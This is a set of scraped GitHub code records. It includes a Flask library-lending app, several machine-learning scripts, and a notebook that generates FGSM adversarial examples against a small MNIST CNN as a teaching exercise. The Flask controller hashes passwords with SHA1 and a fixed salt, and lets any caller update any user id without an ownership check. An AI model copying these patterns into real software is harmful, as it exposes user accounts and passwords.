RegistrationForm()\n\treturn render_template(\"new_user_form.html\", form=form)\n\n@app.route(\"/user/new\", methods=[\"POST\"])\ndef add_new_user():\n\tsalt = PASSWORD_SALT\n\t#Get data from Registration Form\n\tform = RegistrationForm(request.form)\n\tif not form.validate():\n\t\tflash(\"All fields are required.\")\n\t\treturn render_template(\"new_user_form.html\", form=form)\n\tgiven_name = form.given_name.data\n\tsurname = form.surname.data\n\temail = form.email.data\n\tpassword = hashlib.sha1(form.password.data+salt).hexdigest()\n\tuser_exist = model.session.query(model.User).filter_by(email=email).all()\n\t#check to see if user exists\n\tif user_exist:\n\t\tflash(\"User account has already been created with this email.\")\n\t\treturn render_template(\"login_user.html\", form=form)\n\t#create user object\n\tuser = model.User(given_name=given_name, surname=surname, email=email, password=password, admin=0)\n\tmodel.session.add(user)\n\tmodel.session.commit()\n\tsession[\"email\"] = email\n\tif form.validate_on_submit():\n\t\tflash (\"Your account has been created, \" + form.given_name.data + \".\")\t\t\n\t\treturn 
redirect(\"/index\")\n\treturn redirect(\"/user/new\")\n\n@app.route(\"/user/login\", methods=[\"GET\"])\ndef user_login_form():\n\tform = LoginForm()\n\treturn render_template(\"login_user.html\", form=form)\n\n@app.route(\"/user/login\", methods=[\"POST\"])\ndef user_login():\t\n\tsalt = PASSWORD_SALT\n\tform = LoginForm(request.form)\n\temail = form.email.data\n\tpassword = hashlib.sha1(form.password.data+salt).hexdigest()\n\tuser_list = model.session.query(model.User).filter_by(email=email, password=password).all()\n\tif user_list:\t\n\t\tsession[\"email\"] = email\n\t\tif user_list[0].admin == 1:\n\t\t\tsession[\"admin\"] = True\n\t\telse:\n\t\t\tsession[\"admin\"] = False\n\t\tgiven_name = user_list[0].given_name\n\t\tflash(\"You are authenticated, \" + given_name + \".\")\n\t\treturn redirect(\"/index\")\n\telse:\n\t\tflash(\"User not authenticated.\")\n\t\treturn render_template(\"login_user.html\", form=form)\n\n@app.route(\"/user/logout\")\ndef logout():\n\tsession.clear()\n\tflash(\"You are now logged out.\")\n\treturn redirect(\"/index\")\n\n@app.route(\"/user//edit\")\ndef edit_user(id):\n\tcurrent_user = model.session.query(model.User).get(id)\n\tif not current_user:\t\n\t\tflash (\"You are not logged in.\")\n\tform = UpdateUser()\n\treturn render_template(\"update_user.html\", user=current_user, form=form)\n\n@app.route(\"/user//update\",methods=[\"POST\"])\ndef update_user(id):\n\tsalt = PASSWORD_SALT\n\tform = UpdateUser(request.form)\n\tcurrent_user = model.session.query(model.User).get(id)\n\tif not current_user:\n\t\tflash (\"You are not logged in.\")\n\n\tuser_save = False\t\n\n\tform = UpdateUser(request.form)\n\tif form.given_name and form.given_name.data != '':\n\t\tcurrent_user.given_name = form.given_name.data\n\t\tuser_save = True\n\tif form.surname and form.surname.data != '':\n\t\tcurrent_user.surname = form.surname.data\n\t\tuser_save = True\n\tif form.email and form.email.data != '':\n\t\tcurrent_user.email = form.email.data\n\t\tsession[\"email\"] = current_user.email\n\t\tuser_save = True\n\tif form.password and form.password.data != '':\t\n\t\tcurrent_user.password = hashlib.sha1(form.password.data+salt).hexdigest() \n\t\tuser_save = True\n\tif user_save:\n\t\tmodel.session.add(current_user)\n\t\tmodel.session.commit()\n \n\tflash(\"You have successfully updated your account, \" + current_user.given_name + \".\")\n\treturn redirect(\"/index\")\n\t\t\n@app.route(\"/amazon/search\", methods=[\"GET\", \"POST\"])\ndef amazon_search():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tif session['admin']:\n\t\tform = AmazonSearch()\n\t\tif form.validate_on_submit():\n\t\t\tbooks = get_book_by_title_author(form.title.data, form.author.data)\n\t\t\t#get_book_by_title_author is defined in search_amazon\n\t\t\treturn render_template(\"amazon_results.html\", amazon_res=books, user=user)\n\t\telse:\n\t\t\treturn render_template(\"amazon_search.html\", form=form, user=user)\n\telse:\n\t\treturn \"You are not authorized to do this.\"\n\n@app.route(\"/amazon/add_book\", methods=[\"GET\"])\ndef add_book():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tasin = request.args.get(\"asin\")\n\ttitle = unicode(request.args.get(\"title\"))\n\tauthor = unicode(request.args.get(\"author\"))\n\tamazon_url = request.args.get(\"amazon_url\")\n\tgenre, description, image = get_book_info(asin)\n\tbook = model.Book(title=title,\n\t author=author,\n\t 
genre=genre,\n\t description=description,\n\t image_url=image,\n\t amazon_url=amazon_url,\n\t asin=asin)\n\tbook_exist = model.session.query(model.Book).filter_by(title=title).all()\n\tform = AmazonSearch()\n\t# if book is already in the database, return to amazon_search\n\tif book_exist:\t\n\t \tflash(\"Book is already in the database.\")\n\t \treturn render_template(\"amazon_search.html\", form=form, user=user)\n\tmodel.session.add(book)\n\tmodel.session.commit()\n\treturn render_template(\"view_added_book.html\", book=book, user=user)\n\n@app.route(\"/book/search\", methods=[\"GET\", \"POST\"])\ndef book_search_form():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tform = BookSearch()\n\ttitle = request.form.get(\"title\")\n\tauthor = request.form.get(\"author\")\n\t\n\tif form.validate_on_submit():\n\t\tbooks_query = model.session.query(model.Book)\n\t\t\n\t\tif title:\n\t\t\tbooks = books_query.filter(model.Book.title.ilike(\"%\"+title+\"%\")).all()\n\n\t\telif author:\n\t\t\tbooks = books_query.filter(model.Book.author.ilike(\"%\"+author+\"%\")).all()\n\t\t\n\t\telif title and author:\n\t\t\tbooks = books_query.filter(model.Book.author.ilike(\"%\"+author+\"%\"), \n\t\t\t\t model.Book.title.ilike(\"%\"+title+\"%\")).all()\n\n\t\tif not books:\n\t\t\tflash(\"No books were found matching your search terms.\")\n\t\t\treturn render_template(\"book_search.html\", form=form, user=user)\n\t\treturn render_template(\"book_results.html\", book_results=books, user=user)\n\treturn render_template(\"book_search.html\", form=form, user=user)\n\n@app.route(\"/book/\", methods=[\"GET\"])\ndef view_book(id):\n\tbook = model.session.query(model.Book).get(id)\n\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tstatus = book.get_status()\n\treturn render_template(\"view_book.html\", book=book, status=status, user=user) \n\n@app.route(\"/book//request\", methods=[\"GET\"])\ndef book_request(id):\t\n\tif session[\"email\"]:\n\t\tbook = model.session.query(model.Book).get(id)\n\t\trequester = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\t\tnew_request = model.BookStatus(book_id=book.id, requester_id=requester.id)\n\t\tmodel.session.add(new_request)\n\t\tmodel.session.commit()\n\t\tflash (\"You have requested to borrow this book.\")\n\t\t#Send Twilio message when someone requests to borrow a book\n\t\tmessage = client.messages.create(body=\"Kristin, \" + requester.given_name + \n\t\t\t \" \" + requester.surname + \n\t\t\t \" has requested to borrow the book: \" \n\t\t\t + book.title + \".\",\n\t\t\t to=my_phone, \n\t\t\t from_=twilio_phone)\t\t\t\n\treturn redirect(url_for(\"view_book\", id=id)) \n\n@app.route(\"/book//update_status\", methods=[\"GET\"])\ndef book_update_status(id):\t\n\tif session['admin']:\n\t\tbook = model.session.query(model.Book).get(id)\n\t\trequester = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\t\tstatus = model.session.query(model.BookStatus).filter_by(book_id=book.id, checked_in=None).all()\n\t\t#Checks in specific book if it shows as either requested or checked-out. 
\n\t\tfor s in status:\n\t\t\tif s.checked_in == None:\n\t\t\t\ts.checked_in = datetime.now()\t\t\n\t\tmodel.session.commit()\n\treturn redirect(url_for(\"view_book\", id=id))\n\n\n\n\n\n\t\t\n\n\n","repo_name":"kfran99/Library-of-Kristin","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":8641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9261765429","text":"# 岭回归\r\nfrom sklearn.datasets import load_boston #sklearn波士顿房价预测数据接口\r\nfrom sklearn.model_selection import train_test_split #划分数据集\r\nfrom sklearn.preprocessing import StandardScaler #数据标准化\r\nfrom sklearn.linear_model import Ridge #预估器(正规方程)、预估器(梯度下降学习)、岭回归\r\nfrom sklearn.metrics import mean_squared_error #均方误\r\nfrom sklearn.externals import joblib #模型的加载与保存\r\ndef linear():\r\n # 1)获取数据\r\n boston = load_boston()\r\n print(\"特征数量:\\n\", boston.data.shape)\r\n # 2)划分数据集\r\n x_train, x_test, y_train, y_test = train_test_split(boston.data, boston.target, random_state=22)\r\n # 3)标准化\r\n transfer = StandardScaler()\r\n x_train = transfer.fit_transform(x_train)\r\n x_test = transfer.transform(x_test)\r\n # 4)预估器\r\n estimator = Ridge(alpha=0.5, max_iter=10000)\r\n estimator.fit(x_train, y_train)\r\n # 保存模型\r\n joblib.dump(estimator, \"my_ridge.pkl\")\r\n # 加载模型 使用时注销 4)预估器 和 保存模型\r\n # estimator = joblib.load(\"my_ridge.pkl\"\r\n # 5)得出模型\r\n print(\"岭回归-权重系数为:\\n\", estimator.coef_)\r\n print(\"岭回归-偏置为:\\n\", estimator.intercept_)\r\n # 6)模型评估\r\n y_predict = estimator.predict(x_test)\r\n error = mean_squared_error(y_test, y_predict)\r\n print(\"岭回归-均方误差为:\\n\", error)\r\n return None\r\nif __name__ == \"__main__\":\r\n linear()\r\n\r\n","repo_name":"HuichuanLI/play_with_machine_learning_book","sub_path":"一些经典的机器学习的实现/岭回归.py","file_name":"岭回归.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16157047918","text":"\"\"\" M4N9 Computational Linear Algebra - Project 2\nTudor Trita Trita\nCID: 01199397\n\nImplemented using Python 3.7 (need f-string python 3.6+)\n\nQuestion 3. 
Exponential Integrators\n\"\"\"\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.linalg\nimport scipy.sparse.linalg\nimport time\n\nimport question2\nimport rexi_coefficients\n\n\nclass Computations:\n \"\"\" Contains Runge Kutta 2nd Order, REXI and Direct Solution.\"\"\"\n def __init__(self, N=100, H=10):\n self.N = N\n self.H = H\n\n self.initial_condition()\n self.matrices()\n\n def initial_condition(self):\n self.dx = self.H / (self.N + 1)\n self.inv_dx = 1/self.dx\n self.inv_dx2 = self.inv_dx**2\n\n self.x = np.linspace(0, self.H, self.N, dtype=np.complex128)\n self.V0 = np.exp(-(self.x-5)**2/0.2) - np.exp(-125)\n self.W0 = np.zeros(self.N, dtype=np.complex128)\n self.U0 = np.concatenate((self.V0, self.W0))\n\n def matrices(self):\n \"\"\" Initialises the matrices L and K.\"\"\"\n # Creating L\n L = scipy.sparse.diags((self.inv_dx2, -2*self.inv_dx2, self.inv_dx2, 1),\n (-(self.N+1), -self.N, -(self.N-1), self.N),\n shape=(2*self.N, 2*self.N), dtype=np.complex128)\n self.L = scipy.sparse.csr_matrix(L)\n self.L[-(self.N+1), 0], self.L[-1, -self.N] = 0, 0\n\n # Computing largest eigenvalue of L explicitely:\n self.mu_max = self.inv_dx*np.sqrt(2*(1 + np.cos(np.pi/(self.N+1))))\n\n # Creating K\n self.K = scipy.sparse.diags((-self.inv_dx2, 2*self.inv_dx2, -self.inv_dx2),\n (-1, 0, 1), # Diagonals\n shape=(self.N, self.N), # Size of matrix\n dtype=np.complex128)\n\n def EXPM(self, T):\n U = scipy.linalg.expm(T*self.L) @ self.U0\n return U\n\n def RK2(self, T=2.5, dt=0.00001):\n \"\"\" Computes Runge Kutta 2nd Order solution of the initial condition\n at time T with steps dt.\n \"\"\"\n t_space = np.linspace(0, T, 1 + T/dt)\n U = self.U0.copy()\n half_dt_L = (dt / 2) * self.L\n dt_L = dt * self.L\n\n for i, t in enumerate(t_space[1:]):\n U_hlf = U + half_dt_L @ U\n U += dt_L @ U_hlf\n return U\n\n def REXI(self, T=2.5, h=None, M=None):\n \"\"\"REXI Exponential Integrator Solution\"\"\"\n if h:\n M = 1.1*T*self.mu_max/h\n elif M:\n h = 1.1*T*self.mu_max/M\n else:\n raise Exception(\"ERROR: At least ONE of h or M needs to be assigned!\")\n\n alpha, beta = rexi_coefficients.RexiCoefficients(h, M)\n J = alpha.shape[0]\n\n # Initialising variables V, W:\n V = np.zeros((self.N, J), dtype=np.complex128)\n W = np.zeros((self.N, J), dtype=np.complex128)\n\n # Pre-computing terms outside of the loop:\n LHS_pre = T**2 * self.K\n RHS_pre = self.W0*T\n for j in range(J):\n LHS = LHS_pre + scipy.sparse.diags([alpha[j]**2],\n offsets=0,\n shape=[self.N, self.N],\n dtype=np.complex128)\n RHS = alpha[j]*self.V0 - RHS_pre\n L, U = question2.bandedLU(LHS, 1, 1)\n RHS2 = scipy.sparse.linalg.spsolve_triangular(L, RHS, lower=True)\n # Can't use spsolve_triangular again as U isn't completely upper-triangular due to roundoff\n V[:, j] = scipy.sparse.linalg.spsolve(U, RHS2)\n W[:, j] = (self.V0 - alpha[j]*V[:, j])/T\n\n # End loop:\n Uj_mat = np.concatenate((V, W), axis=0)\n U = np.sum(np.multiply(Uj_mat, beta[None, :]), axis=1)\n return U, (h, M)\n\n def plot_solutions(self, solutions_list, plot_w=False, savefig_filename=None, display=True):\n \"\"\" Plots solutions for different times and methods.\n solutions_dict needs to be in the following format:\n [[solution1, [method1, T1]], [solution2, [method2, T2]], ...]\n Constrained to parameters the class was initialised with (N, H)\n \"\"\"\n plt.figure(figsize=(13, 8))\n for s in solutions_list:\n U = s[0]\n method, T = s[1]\n plt.plot(self.x, U[:self.N], label=rf\"$U$ : {method}, $T = {T}$\")\n if plot_w:\n 
plt.plot(self.x, U[self.N:], label=rf\"$U_t$ : {method}, $T = {T}$\")\n plt.xlabel(r\"$x$\")\n plt.ylabel(r\"$U, U_t$\")\n plt.title(\"Plot of Various Models at Different Times\")\n plt.legend()\n plt.grid()\n if savefig_filename:\n plt.savefig(savefig_filename) if savefig_filename.endswith(\".png\") else plt.savefig(savefig_filename+\".jpg\")\n if display:\n plt.show()\n\ndef main():\n # FIGURE 0: Showing Wave at Time 2.5 for REXI & RK2 (CAST TO REALS)\n C1 = Computations(N=100, H=10)\n U_REXI, _ = C1.REXI(T=2.5, M=50)\n U_RK2 = C1.RK2()\n C1.plot_solutions([[U_REXI, ['REXI', 2.5]],\n [U_RK2, ['RK2', 2.5]]],\n plot_w=True)\n\n # FIGURE 1: Contour plot of solution propagating through time (CAST TO REALS)\n C2 = Computations(N=100, H=10)\n times_array = np.linspace(0, 5)\n for i, T in enumerate(times_array[1:]):\n print(i)\n U_REXI, _ = C2.REXI(T=T, M=30)\n if i==0:\n U_REXI_MATRIX = np.concatenate([C2.U0[:, None], U_REXI[:, None]], axis=1)\n else:\n U_REXI_MATRIX = np.concatenate([U_REXI_MATRIX, U_REXI[:, None]], axis=1)\n\n fig1 = plt.figure(figsize=(13, 8))\n plt.contourf(C2.x, times_array, U_REXI_MATRIX[:C2.N, :].T, cmap=matplotlib.cm.jet)\n plt.colorbar()\n plt.xlabel(\"X Interval [0, H]\")\n plt.ylabel(\"Time T\")\n title1 = \"Figure 1 - Countour plot of REXI Solution at Various Times\"\n plt.title(title1)\n plt.savefig(title1+\".png\")\n plt.show()\n\n # FIGURE 2: Computing convergence between RK2 and REXI FOR varying M, dt:\n C3 = Computations(N=10, H=10)\n U_RK2_1 = C3.RK2(T=2.5, dt=pow(10, -4))\n U_RK2_2 = C3.RK2(T=2.5, dt=pow(10, -5))\n U_RK2_3 = C3.RK2(T=2.5, dt=pow(10, -6))\n\n norms1, norms2, norms3 = [], [], []\n range_M = np.linspace(10, 300, 30, dtype=int)\n for M in range_M:\n U_REXI, _ = C3.REXI(M=M)\n norm1 = np.linalg.norm(U_RK2_1 - U_REXI)\n norm2 = np.linalg.norm(U_RK2_2 - U_REXI)\n norm3 = np.linalg.norm(U_RK2_3 - U_REXI)\n\n norms1.append(norm1)\n norms2.append(norm2)\n norms3.append(norm3)\n\n fig2 = plt.figure(figsize=(13, 8))\n plt.semilogy(range_M, norms1, 'r--', label=rf\"$\\Delta t$={pow(10, -4)}\")\n plt.semilogy(range_M, norms2, 'b', label=rf\"$\\Delta t$={pow(10, -5)}\")\n plt.semilogy(range_M, norms3, 'k', label=rf\"$\\Delta t$={pow(10, -6)}\")\n\n plt.xlabel('M')\n plt.ylabel(\"Difference in Norms\")\n title2 = \"Figure 2 - Plot of in Convergence for U_RK2 & U_REXI, varying M and dt (T=2.5)\"\n plt.title(title2, fontsize=15)\n plt.legend()\n plt.grid()\n plt.savefig(title2+\".png\")\n plt.show()\n\n # FIGURE 3: Dependence of M, H for different M, N\n C4 = Computations(N=5)\n C5 = Computations(N=10)\n C6 = Computations(N=15)\n\n range_M = np.linspace(10, 300, 30, dtype=int)\n h1_array, h2_array, h3_array = [], [], []\n for M in range_M:\n U_REXI1, [h1, M] = C4.REXI(M=M)\n U_REXI2, [h2, M] = C5.REXI(M=M)\n U_REXI3, [h3, M] = C6.REXI(M=M)\n h1_array.append(h1)\n h2_array.append(h2)\n h3_array.append(h3)\n\n fig3 = plt.figure(figsize=(13, 8))\n plt.plot(range_M, h1_array, 'r--', label=\"REXI N=5\")\n plt.plot(range_M, h2_array, 'b', label=\"REXI N=10\")\n plt.plot(range_M, h3_array, 'k', label=\"REXI N=15\")\n\n plt.xlabel('M')\n plt.ylabel('h')\n title3 = \"Figure 3 - Plotting dependencies of h and M for different N\"\n plt.title(title3, fontsize=15)\n plt.legend()\n plt.grid()\n plt.savefig(title3+\".png\")\n plt.show()\n return\n\nif __name__ == \"__main__\":\n print(\"Program Started\")\n print()\n main()\n print()\n print(\"Program 
Finished\")\n","repo_name":"tudortrita/M4N9-Computational-Linear-Algebra","sub_path":"cw2/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33066546561","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,../scripts/modeling//py\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.13.7\n# kernelspec:\n# display_name: Python 3.8.0 ('fraud-class')\n# language: python\n# name: python380jvsc74a57bd03cd04a71416ab130df52c6ad253f6c01cfe1f5da6ec3d93fcc0cee3c0dbab0b4\n# ---\n\n# +\nimport numpy as np \nimport pandas as pd \nimport datasist as ds\nimport datasist.project as dp\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import cross_val_score, train_test_split\n# -\n\n#retrieve data from the processed folder\ntrain = dp.get_data(\"train_proc.csv\", method='csv')\ntest = dp.get_data(\"test_proc.csv\", method='csv')\nlabels = dp.get_data(\"train_labels.csv\", method='csv')\n\n# +\nX_train, X_test, y_train, y_test = train_test_split(train, labels, test_size=0.3, random_state=2)\n\nrf_model = RandomForestClassifier(n_estimators=100,random_state=232)\nlg_model = LogisticRegression(max_iter=100, random_state=2, solver='lbfgs')\n\n# +\nlg_model.fit(X_train, y_train)\npred = lg_model.predict(X_test)\n\n#Get report from true and predicted values\nds.model.get_classification_report(y_test, pred)\n\n\n# -\n\ndef get_classification_report(y_train=None, prediction=None, show_roc_plot=True, save_plot=False):\n '''\n Generates performance report for a classification problem.\n\n Parameters:\n ------------------\n y_train: Array, series, list.\n\n The truth/ground value from the train data set.\n \n prediction: Array, series, list.\n\n The predicted value by a trained model.\n\n show_roc_plot: Bool, default True.\n\n Show the model ROC curve.\n\n save_plot: Bool, default True.\n\n Save the plot to the current working directory.\n\n '''\n acc = accuracy_score(y_train, prediction)\n f1 = f1_score(y_train, prediction)\n precision = precision_score(y_train, prediction)\n recall = recall_score(y_train, prediction)\n confusion_mat = confusion_matrix(y_train, prediction)\n\n print(\"Accuracy is \", round(acc * 100))\n print(\"F1 score is \", round(f1 * 100))\n print(\"Precision is \", round(precision * 100))\n print(\"Recall is \", round(recall * 100))\n print(\"*\" * 100)\n print(\"confusion Matrix\")\n print(' Score positive Score negative')\n print('Actual positive %6d' % confusion_mat[0,0] + ' %5d' % confusion_mat[0,1])\n print('Actual negative %6d' % confusion_mat[1,0] + ' %5d' % confusion_mat[1,1])\n print('')\n\n if show_roc_plot: \n plot_auc(y_train, prediction)\n\n if save_plot:\n plt.savefig(\"roc_plot.png\")\n\n\n# +\nrf_model.fit(X_train, y_train)\npred = rf_model.predict(X_test)\n\n#Get report from true and predicted values\nds.model.get_classification_report(y_test, pred)\n# -\n\nds.model.train_classifier(X_train=train, y_train=labels, estimator=rf_model,\n cross_validate=True, cv=5)\n\nfeats = train.columns\n\n\n\n\ndef plot_feature_importance(estimator=None, col_names=None):\n '''\n Plots the feature importance from a trained scikit learn estimator\n as a bar chart.\n\n Parameters:\n -----------\n estimator: scikit 
learn estimator.\n\n Model that has been fit and contains the feature_importance_ attribute.\n\n col_names: list\n\n The names of the columns. Must map onto the feature importance array.\n\n Returns:\n --------\n Matplotlib figure showing feature importances\n '''\n if estimator is None:\n raise ValueError(\"estimator: Expecting an estimator that implements the fit api, got None\")\n if col_names is None:\n raise ValueError(\"col_names: Expecting a list of column names, got 'None'\")\n \n if len(col_names) != len(estimator.feature_importances_):\n raise ValueError(\"col_names: Length of col_names must match length of feature importances\")\n\n imps = estimator.feature_importances_\n feats_imp = pd.DataFrame({\"features\": col_names, \"importance\": imps}).sort_values(by='importance', ascending=False)\n sns.barplot(x='features', y='importance', data=feats_imp)\n plt.xticks(rotation=90)\n plt.title(\"Feature importance plot\")\n plt.show()\n\n\nplot_feature_importance(estimator=rf_model, col_names=feats)\n\ndp.save_model(rf_model, name='rf_model_n10')\n\n\n# pickling the model\nimport pickle\npickle_out = open(\"../../outputs/models/rf_model.pkl\", \"wb\")\npickle.dump(rf_model, pickle_out)\npickle_out.close()","repo_name":"Danselem/fraud-classifier","sub_path":"fraud-class/src/scripts/modeling/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17012836381","text":"#!/usr/bin/env python3\n\"\"\"\n\n\"\"\"\n##-- imports\nfrom __future__ import annotations\n\nimport logging as logmod\nimport unittest\nimport warnings\nimport pathlib as pl\nfrom typing import (Any, Callable, ClassVar, Generic, Iterable, Iterator,\n Mapping, Match, MutableMapping, Sequence, Tuple, TypeAlias,\n TypeVar, cast)\nfrom unittest import mock\n##-- end imports\n\nimport pytest\nimport tomler\nimport doot\nfrom importlib.metadata import EntryPoint\ndoot.config = tomler.Tomler({})\nfrom doot.loaders import cmd_loader\nlogging = logmod.root\n\nclass TestCmdLoader(unittest.TestCase):\n\n def test_initial(self):\n basic = cmd_loader.DootCommandLoader()\n assert(basic is not None)\n\n def test_load_basic(self):\n basic = cmd_loader.DootCommandLoader()\n basic.setup(tomler.Tomler({\n \"command\" : [\n EntryPoint(name=\"list\", group=\"doot.command\", value=\"doot.cmds.list_cmd:ListCmd\")\n\n ]}))\n result = basic.load()\n assert(\"list\" in result)\n\n def test_load_multi(self):\n basic = cmd_loader.DootCommandLoader()\n basic.setup(tomler.Tomler({\n \"command\" : [\n EntryPoint(name=\"list\", group=\"doot.command\", value=\"doot.cmds.list_cmd:ListCmd\"),\n EntryPoint(name=\"run\", group=\"doot.command\", value=\"doot.cmds.run_cmd:RunCmd\"),\n\n ]}))\n result = basic.load()\n assert(\"list\" in result)\n assert(\"run\" in result)\n\n def test_load_fail(self):\n basic = cmd_loader.DootCommandLoader()\n basic.setup(tomler.Tomler({\n \"command\" : [\n EntryPoint(name=\"bad\", group=\"doot.command\", value=\"doot.cmds.bad:badcmd\"),\n\n ]}))\n with pytest.raises(doot.errors.DootPluginError):\n basic.load()\n","repo_name":"jgrey4296/doot","sub_path":"doot/loaders/__tests/test_cmd_loader.py","file_name":"test_cmd_loader.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17251789034","text":"\n# coding: utf-8\n\n# # Attacking a CNN\n# \n# In this exercise we will train a CNN to distinguish between 
handwritten `0` and `1`. We will be using `keras` to do this. \n# \n# Once we have a trained classifier we will be using `cleverhans` to create adversarial examples\n\n# In[ ]:\n\n\nimport warnings\nimport numpy as np\nimport os\nwith warnings.catch_warnings():\n import keras # keras is still using some deprecated code\nfrom keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense\nfrom cleverhans.utils_keras import KerasModelWrapper\nfrom cleverhans.attacks import BasicIterativeMethod, FastGradientMethod, CarliniWagnerL2\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n\n# The MNIST dataset contains data for all the digits. We are only interested in the 1s and 0s though, therefore we are extracting those from the dataset. \n# \n# We also need to normalize the data. This means that whatever interval the input values have been in will be squashed to `[0,1]`\n\n# In[ ]:\n\n\ndef exract_ones_and_zeroes( data, labels ):\n # data_zeroes = data[ np.argwhere( labels == 0 ) ]\n # data_ones = data[ np.argwhere( labels == 1 ) ]\n data_zeroes = data[ np.argwhere( labels == 0 ).reshape( -1 ) ][ :200 ]\n print( data_zeroes.shape )\n data_ones = data[ np.argwhere( labels == 1 ).reshape( -1 ) ][ :200 ]\n x = np.vstack( (data_zeroes, data_ones) )\n\n # normalize the data\n x = x / 255.\n\n labels_zeroes = np.zeros( data_zeroes.shape[ 0 ] )\n labels_ones = np.ones( data_ones.shape[ 0 ] )\n y = np.append( labels_zeroes, labels_ones )\n\n return x, y\n\n\n# Load the actual data and use our preprocessing function from earlier\n\n# In[ ]:\n\n\nmnist_file = os.path.join( 'data', 'mnist', 'mnist.npz' )\n\n# load the data\nf = np.load( mnist_file )\nx_train, y_train = f[ 'x_train' ], f[ 'y_train' ]\nprint( 'x_train', x_train.shape )\nprint( 'y_train', y_train.shape )\n\nx_test, y_test = f[ 'x_test' ], f[ 'y_test' ]\nprint( 'x_test', x_test.shape )\nprint( 'y_test', y_test.shape )\nf.close( )\n\n# extract ones and zeroes\nx_train, y_train = exract_ones_and_zeroes( x_train, y_train )\nx_test, y_test = exract_ones_and_zeroes( x_test, y_test )\n\n\n# We need to do some more data preprocessing so keras will be happy.\n\n# In[ ]:\n\n\n# we need to bring the data into a format that our cnn likes\ny_train = keras.utils.to_categorical( y_train, 2 )\ny_test = keras.utils.to_categorical( y_test, 2 )\n\nif keras.backend.image_data_format( ) == 'channels_first':\n x_train = x_train.reshape( x_train.shape[ 0 ], 1, x_train.shape[ 1 ], x_train.shape[ 2 ] )\n x_test = x_test.reshape( x_test.shape[ 0 ], 1, x_test.shape[ 1 ], x_test.shape[ 2 ] )\n input_shape = (1, x_train.shape[ 2 ], x_train.shape[ 3 ])\nelse:\n x_train = x_train.reshape( x_train.shape[ 0 ], x_train.shape[ 1 ], x_train.shape[ 2 ], 1 )\n x_test = x_test.reshape( x_test.shape[ 0 ], x_test.shape[ 1 ], x_test.shape[ 2 ], 1 )\n input_shape = (x_train.shape[ 1 ], x_train.shape[ 2 ], 1)\n\n\n\n# We need to make sure that `cleverhans` has access to our model graph. To do this we make sure that `keras` uses the same `tensorflow` session that `cleverhans` will be using. \n\n# In[ ]:\n\n\n# need to do some setup so everything gets executed in the same tensorflow session\nsession = tf.Session( )\nkeras.backend.set_session( session )\n\n\n# We are using a very simple CNN. For our two output classes this is probably overkill. 
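It is essentially the standard Keras MNIST convnet: two convolution layers, max-pooling, dropout, and two dense layers. 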
This network can be used to distinguish between all 10 classes with very high accuracy.\n\n# In[ ]:\n\n\n# define the classifier\nclf = keras.Sequential( )\nclf.add( Conv2D( 32, kernel_size=(3, 3), activation='relu', input_shape=input_shape ) )\nclf.add( Conv2D( 64, (3, 3), activation='relu' ) )\nclf.add( MaxPooling2D( pool_size=(2, 2) ) )\nclf.add( Dropout( 0.25 ) )\nclf.add( Flatten( ) )\nclf.add( Dense( 128, activation='relu' ) )\nclf.add( Dropout( 0.5 ) )\nclf.add( Dense( 2, activation='softmax' ) )\n\nclf.compile( loss=keras.losses.categorical_crossentropy,\n optimizer='adam',\n metrics=[ 'accuracy' ] )\n\nclf.fit( x_train, y_train,\n epochs=2,\n verbose=1 )\n#clf.summary( )\nscore = clf.evaluate( x_test, y_test, verbose=0 )\nprint( 'Test loss:', score[ 0 ] )\nprint( 'Test accuracy:', score[ 1 ] )\n\n\n# Let's get to the actual attack magic. First we pick a sample that we want to perturb. Then we use the FGSM attack and the Carlini & Wagner L2 attack to perturb it into an adversarial example.\n\n# In[ ]:\n\n\n# choose a sample to perturb\nsample_ind = 100\n\n# picking a test sample\nsample = x_test[ sample_ind, : ]\n\n\n# plot the chosen test sample\nplt.imshow( sample.reshape( 28, 28 ), cmap=\"gray_r\" )\nplt.axis( 'off' )\nplt.show( )\n\n# constructing adversarial examples\nprint( 'class prediction for the test samples:',\n clf.predict( sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ) ) )\n# setup the attack\nwrapper = KerasModelWrapper( clf )\nfgm = FastGradientMethod( wrapper, sess=session )\neps = 0.3 # allowed maximum modification\n\n# execute the attack\nwith warnings.catch_warnings():\n modified_sample = fgm.generate_np( sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ),\n **{ 'eps': eps } )\n\nprint( 'class prediction for the modified test samples:',\n clf.predict( modified_sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ) ) )\nplt.imshow( modified_sample.reshape( 28, 28 ), cmap=\"gray_r\" )\nplt.axis( 'off' )\nplt.show( )\n\n# let's try a stronger 